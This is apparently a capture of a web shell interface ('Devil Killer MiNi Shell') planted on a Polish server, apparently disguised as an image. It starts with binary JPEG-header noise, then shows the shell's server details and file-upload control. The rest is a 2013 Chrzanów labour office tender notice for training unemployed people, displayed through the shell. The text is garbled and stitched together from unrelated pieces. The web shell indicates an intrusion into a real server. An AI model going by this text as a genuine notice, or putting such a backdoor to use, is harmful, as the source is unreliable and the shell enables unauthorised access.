JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130319/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130319/108568-N-2013.html

<p class="kh_header"><b>Chrzanów: Przeprowadzenie szkoleń grupowych dla:osób bezrobotnych zarejestrowanych w Powiatowym Urzędzie Pracy w Chrzanowie.</b><br>
<b>Numer ogłoszenia: 108568 - 2013; data zamieszczenia: 19.03.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowy Urząd Pracy w Chrzanowie , ul. Słowackiego 8, 32-500 Chrzanów, woj. małopolskie, tel. 032 7533800, faks 032 7533899.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.pup-chrzanow.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> www.pup-chrzanow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przeprowadzenie szkoleń grupowych dla:osób bezrobotnych zarejestrowanych w Powiatowym Urzędzie Pracy w Chrzanowie..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przeprowadzenie szkoleń grupowych dla:osób bezrobotnych zarejestrowanych w Powiatowym Urzędzie Pracy w Chrzanowie.  Zamówienie składa się z  9  części: 

Część 1.  Operator ładowarki  jednonaczyniowej do 2,5m3 klasa III:    - dla   15  osób,  planowany termin realizacji:   II kwartał 2013. 

Część 2. Monter nawierzchni drogowych: Brukarz - dla 15 osób, planowany termin realizacji: II kwartał 2013.

Część  3.  Pierwsze kroki w biznesie - czyli organizacja  i prowadzenie  własnej firmy:- dla  60  osób podzielonych  na 4 grupy 15 osobowe  ); planowany termin realizacji: I grupa - II kwartał 2013;  II grupa - III kwartał 2013; III grupa - III kwartał 2013; IV grupa - IV kwartał 2013r.

Część  4.  Kucharz małej gastronomii  - dla 10 osób, planowany termin realizacji:  II kwartał 2013r.

Część 5.    Opiekun osoby starszej i niepełnosprawnej z językiem niemieckim  - dla 10 osób, planowany termin realizacji:  II / III kwartał 2013.
Cześć 6.   Pracownik ochrony osób i mienia I stopnia - dla 10 osób, planowany termin realizacji: II / III kwartał 2013r. 
Cześć  7.  Księgowość komputerowa -  ( obsługa programów CDN Optima i Symfonia): - dla 15 osób, planowany termin realizacji: III kwartał 2013r. 

Cześć  8. Spawanie blach i rur spoinami pachwinowymi metodami MAG ( 135)  i TIG ( 141 ):   - dla 10 osób, planowany termin realizacji: III kwartał 2013r. 

Cześć  9. Kasjer handlowy :   - dla 15 osób, planowany termin realizacji - III kwartał  2013r..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 80.53.00.00-8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 9.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.11.2013.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Aktualny wpis do Rejestru Instytucji Szkoleniowych prowadzonego przez Wojewódzki Urząd Pracy właściwy ze względu na siedzibę instytucji szkoleniowej  zgodnie z Rozporządzeniem Ministra Gospodarki i Pracy z dnia 27 października 2004r. w sprawie rejestru instytucji szkoleniowych Dz. U. Nr 236 poz. 2365) - dotyczy wszystkich części zamówienia. 
Potwierdzenie spełniania wymagań określonych w § 25 Rozporządzenia Ministra Gospodarki z dnia 20 września 2001r w sprawie bezpieczeństwa i higieny pracy podczas eksploatacji maszyn i innych urządzeń technicznych do robót ziemnych, budowlanych i drogowych ( Dz. U Nr 118 poz.1263), wystawione przez Instytut Mechanizacji Budownictwa i Górnictwa Skalnego - dotyczy części 1  zamówienia.
Atest Instytutu Spawalnictwa w Gliwicach uprawniający do szkolenia i gzaminowania spawaczy  - okres ważności atestu nie może być krótszy niż termin realizacji szkolenia  -  dotyczy części  8 zamówienia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony, jeżeli Wykonawca wykaże się przeprowadzeniem z należytą starannością, co najmniej jednego szkolenia grupowego w  okresie ostatnich trzech lat ( dla min. 10 osób )  przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy  - w tym okresie - o tematyce tożsamej z przedmiotem zamówienia  dla poszczególnych części zamówienia
( załącznik nr 5 do SIWZ).  
W przypadku rozbieżności pomiędzy nazwą szkolenia wskazaną w SIWZ a nazwą wykazaną w załączniku nr 5 w ocenie doświadczenia będą uwzględnione te szkolenia, w których Wykonawca wykaże,  że program tematyczny zrealizowanych przez niego  zamówień obejmował  co najmniej 70% wymaganego przez Zamawiającego minimum programowego wskazanego w załączniku nr 1 część II do SIWZ  ( stosownie do części zamówienia, której oferta dotyczy ).</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony, jeżeli Wykonawca wykaże,  iż  na czas realizacji zamówienia będzie dysponował  urządzeniami  adekwatnymi do danej  części zamówienia umożliwiającymi realizację szkolenia ( załącznik nr  10 do  SIWZ),


Na jednego  uczestnika  musi przypadać  jedno stanowisko  szkoleniowe wyposażone w  niezbędne narzędzia i materiały . Każdy z uczestników szkolenia powinien  mieć indywidualny  dostęp do sprzętu  i materiałów wykorzystywanych przy realizacji szkolenia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony, jeżeli Wykonawca wykaże,  iż  na czas realizacji zamówienia będzie dysponował   osobą lub osobami do każdej z części zamówienia, które posiadają adekwatne do zakresu szkolenia  kwalifikacje, wykształcenie,  doświadczenie zawodowe ( załącznik nr 11 do  SIWZ). 
Przynajmniej jeden z wykładowców musi posiadać wykształcenie wyższe kierunkowe oraz uprawnienia pedagogiczne i co najmniej roczne doświadczenie w prowadzeniu szkoleń o tematyce zgodnej z przedmiotem zamówienia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.Pisemne oświadczenie o nie zaleganiu z opłacaniem podatków, opłat oraz składek na  ubezpieczenie zdrowotne  i społeczne stanowiące załącznik nr 9 niniejszej specyfikacji, przedstawione w formie oryginału i podpisane przez Wykonawcę lub inną osobę upoważnioną   do podpisania oferty. 
2.Pisemne oświadczenie o zagwarantowaniu zorganizowania szkolenia w granicach administracyjnych powiatu chrzanowskiego  stanowiące załącznik nr  12  niniejszej specyfikacji,  przedstawione w formie oryginału i podpisane przez Wykonawcę lub inną osobę upoważnioną do  podpisania oferty  - nie dotyczy zajęć praktycznych części 6 zamówienia oraz części 1 zamówienia.
3.Oświadczenie  Wykonawcy o spełnieniu warunków udziału w postępowaniu określonych  w  art. 22 ust. 1 ustawy PZP, według wzoru na Załączniku nr 3 do SIWZ ( oryginał),
4.Oświadczenie o posiadaniu aktualnego wpisu  do rejestru instytucji szkoleniowych prowadzonego przez Wojewódzki Urząd Pracy właściwy ze względu na siedzibę instytucji szkoleniowej (Rozporządzenie Ministra Gospodarki i Pracy 
z dnia 27 października 2004 r. w sprawie rejestru instytucji szkoleniowych Dz. U. Nr 236 poz. 2365) - zał. nr 6 do SIWZ. - dotyczy wszystkich części zamówienia.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 0.70</li>
<li>2 - Doświadczenie wykonawcy - 0.20</li>
<li>3 - Posiadanie przez Wykonawcę certyfikatów jakości usług - 0.05</li>
<li>4 - Rodzaj dokumentu potwierdzającego uzyskanie kwalifikacji - 0.05</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zgodnie z art. 144 ust. 1 ustawy Prawo zamówień publicznych Zamawiający dopuszcza   możliwość  zmiany  postanowień  umowy, której wzór stanowi załącznik nr 8 do niniejszej   SIWZ. Zmiany mogą dotyczyć:
-  zakresu  usług objętych umową,  w przypadku  zmian przepisów prawa w tym zakresie,
- miejsca realizacji  świadczeń z  zastrzeżeniem lokalizacji na terenie powiatu chrzanowskiego -  z wyłączeniem zajęć praktycznych części 6 zamówienia oraz części 1 zamówienia,
-  kadry wykonującej przedmiot zamówienia z przyczyn losowych ( za zgodą Zamawiającego ),
-  terminu przeprowadzenia szkolenia  
  - zmiana ilości  osób  objętych  szkoleniem ( w sytuacji gdy szkolenie obejmuje kilka grup liczba osób w poszczególnych grupach może ulec  zmianie pod warunkiem, iż łączna liczba osób objętych szkoleniem ze wszystkich grup nie zmieni się i będzie zgodna  z przedmiotem zamówienia). 
-  zmiana  kosztów szkolenia jeżeli te zmiany są korzystne dla  Zamawiającego,
-  zmiana kosztu osobogodziny jeżeli  ta  zmiana jest  korzystna dla  Zamawiającego
- zmiany w harmonogramie zajęć pod warunkiem zachowania terminu realizacji umowy określonego  w  § 5  umowy szkoleniowej oraz tego  że  plan nauczania będzie obejmował przeciętnie nie mniej niż 25 godzin zegarowych w tygodniu. Termin realizacji zamówienia może ulec zmianie tylko w szczególnie uzasadnionych przypadkach.

Warunkiem dokonania zmiany jest  zawiadomienie o zaistnieniu w/w okoliczności w formie pisemnej .

Ewentualne wprowadzenie wskazanych powyżej zmian do umowy nie może skutkować zwiększeniem wynagrodzenia wynikającego  z tytułu realizacji umowy.
Zgodę na  dokonanie zmian musi wyrazić każda ze stron.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.pup-chrzanow.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Powiatowy Urząd Pracy, ul. Słowackiego 8, 32-500 Chrzanów.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 27.03.2013 godzina 08:30, miejsce: Dziennik Podawczy, parter, Powiatowy Urząd Pracy, ul. Słowackiego 8, 32-500 Chrzanów.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt Nowe Perspektywy realizowany w ramach PROGRAMU OPERACYJNEGO KAPITAŁ LUDZKI PRIORYTET VI Rynek pracy otwarty dla wszystkich DZIAŁANIE 6.1 Poprawa   dostępu do zatrudnienia oraz wspieranie aktywności zawodowej w regionie PODDZIAŁANIE 6.1.3 Poprawa zdolności do zatrudnienia oraz podnoszenie poziomu aktywności zawodowej osób bezrobotnych..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Operator ładowarki jednonaczyniowej do 2,5 m3 klasy III..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia: przeprowadzenie szkolenia dla  15  osób w specjalności: Operator ładowarki jednonaczyniowej do 2,5 m3 klasy III. 
Miejsce organizacji szkolenia:  preferowany powiat chrzanowski.

W przypadku przeprowadzenia zajęć poza miastem Chrzanów  instytucja szkoleniowa zobowiązuje się zapewnić dowóz uczestnikom szkolenia z Chrzanowa na miejsce odbywania zajęć i z powrotem. Koszt dowozu zostanie  wliczony do ceny szkolenia od jednej osoby i wykazany w odrębnej pozycji w preliminarzu kosztów szkolenia tj. w poz. nr 9 załączniku nr 7 do SIWZ).  

Program szkolenia powinien obejmować min.  176  godzin dydaktycznych.  Szkolenie powinno być zorganizowane zgodnie z Rozporządzeniem  Ministra Gospodarki z dnia 20 września 2001r. w sprawie bezpieczeństwa i higieny pracy podczas eksploatacji maszyn i innych urządzeń technicznych do robót ziemnych, budowlanych i drogowych ( Dz. U. Nr 118 poz. 1263), przeprowadzone w oparciu o program zatwierdzony przez Instytut Mechanizacji  Budownictwa  i Górnictwa Skalnego w Warszawie. 
Sposób organizacji zajęć praktycznych: 
Zajęcia praktyczne mają być przeprowadzone zgodnie z Rozporządzeniem  Ministra Gospodarki z dnia 20 września 2001r. w sprawie bezpieczeństwa i higieny pracy podczas eksploatacji maszyn i innych urządzeń technicznych do robót ziemnych, budowlanych i drogowych ( Dz. U. Nr 118 poz. 1263) . 
 W  ramach zajęć praktycznych uczestnicy nabędą m.in. następujące umiejętności:
Sporządzanie dokumentacji eksploatacyjnej 
Jazda ładowarką
Praca ładowarką
Konserwacja ładowarki. 
 Wykonawca zabezpiecza sprzęt techniczny oraz materiały do zajęć praktycznych. 


Czas trwania:  nie dłużej niż 30 kolejnych dni roboczych. 
Termin realizacji szkolenia:  II kwartał 2013r. 
Inne postanowienia:
Każdy uczestnik po pozytywnym zdaniu egzaminu otrzyma:
a) Świadectwo Instytutu Mechanizacji Budownictwa i Górnictwa Skalnego
b) Książkę operatora maszyn roboczych
c) Zaświadczenie wystawione na papierze firmowym PO KL  zgodnie  z wymogami określonymi w § 75 ust. 3 Rozporządzenia Ministra Pracy  i Polityki Społecznej z dnia  14  września 2010 r. w sprawie standardów
 i warunków prowadzenia usług rynku pracy ( Dz. U. nr 177, poz. 1193 ).
d)  Zaświadczenie na druku MEN jeśli instytucja posiada możliwość jego wystawienia. 

Ustala się, że kurs zakończy się egzaminem  przed komisją z Instytutu Mechanizacji Budownictwa i Górnictwa Skalnego..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 80.53.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 30.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 0.70</li>
<li>2. Doświadczenie wykonawcy - 0.20</li>
<li>3. Posiadanie przez Wykonawcę certyfikatów jakości usług - 0.05</li>
<li>4. Rodzaj dokumentu potwierdzającego uzyskanie kwalifikacji - 0.05</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Monter nawierzchni drogowych - Brukarz..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia: przeprowadzenie szkolenia dla 15  osób bezrobotnych w specjalności: Monter nawierzchni drogowych - Brukarz.  

Miejsce organizacji szkolenia:  powiat chrzanowski. W przypadku przeprowadzenia zajęć poza miastem Chrzanów  instytucja szkoleniowa zobowiązuje się zapewnić dowóz uczestnikom szkolenia z Chrzanowa na miejsce odbywania zajęć i z powrotem. Koszt dowozu zostanie  wliczony do ceny szkolenia od jednej osoby i wykazany w odrębnej pozycji w preliminarzu kosztów szkolenia tj. w poz. nr 9 załączniku nr 7 do SIWZ).  
Dokładne miejsce odbywania zajęć praktycznych  strony ustalą wspólnie przed podpisaniem umowy, z zastrzeżeniem  że zajęcia praktyczne odbędą się na terenie gminy Chrzanów.  

Program szkolenia powinien obejmować  180 godzin dydaktycznych i zawierać następujące moduły:
Bezpieczeństwo i  higiena pracy przy wykonywaniu robót budowlanych ze szczególnym uwzględnieniem robót brukarskich i drogowych,
Materiałoznawstwo
Technologia z elementami maszynoznawstwa 
Podstawy rysunku technicznego 
Maszyny, sprzęt i narzędzia do robót ziemnych
Zasady postępowania w razie wypadku w czasie pracy i w sytuacjach zagrożeń, w tym zasady udzielania pierwszej pomocy w razie wypadku
Zajęcia praktyczne:
Wykonywanie wykopów, skarp i nasypów
Wykonanie nawierzchni brukowych z kamieni
Wykonanie nawierzchni z kostek i płytek betonowych

W programie szkolenia muszą być wykorzystane standardy kwalifikacji zawodowych i modułowych programów szkoleń zawodowych do zawodu brukarz, dostępnych pod adresem www.standardyiszkolenia.praca.gov.pl.

Program powinien zawierać wskazane powyżej  minimum programowe , które może zostać poszerzone o zagadnienia, które w ocenie Wykonawcy winny być zrealizowane celem odpowiedniego przygotowania uczestników szkolenia.

Sposób organizacji zajęć praktycznych: 

W ramach zajęć praktycznych uczestnicy szkolenia mają wykonać zakres prac związanych z wyłożeniem nawierzchni 
o powierzchni min. 200 m2  zgodnie z technologią prac brukarskich, która powinna obejmować :

przygotowanie podłoża do korytowania 
korytowanie podłoża
wykonanie podbudowy wraz z zagęszczeniem
ułożenie obrzeży
ułożenie kostki brukowej
spoinowanie powierzchni ułożonej
wyłożenie kostki brukowej.


Stosunek liczby godzin praktycznych do ogólnej liczby godzin nie może być mniejszy niż 70%. Wykonawca zabezpiecza sprzęt techniczny oraz materiały do zajęć praktycznych oraz odzież roboczą . 

Czas trwania: nie dłużej niż 30 kolejnych dni roboczych.  

Termin realizacji szkolenia: II kwartał 2013. 

Inne postanowienia:

Każdy uczestnik po pozytywnym zdaniu egzaminu otrzyma;
Zaświadczenie wystawione na papierze firmowym PO KL SIWZ  zgodnie  z wymogami określonymi w § 75 ust. 3 Rozporządzenia Ministra Pracy  i Polityki Społecznej z dnia  14  września 2010 r. w sprawie standardów. 
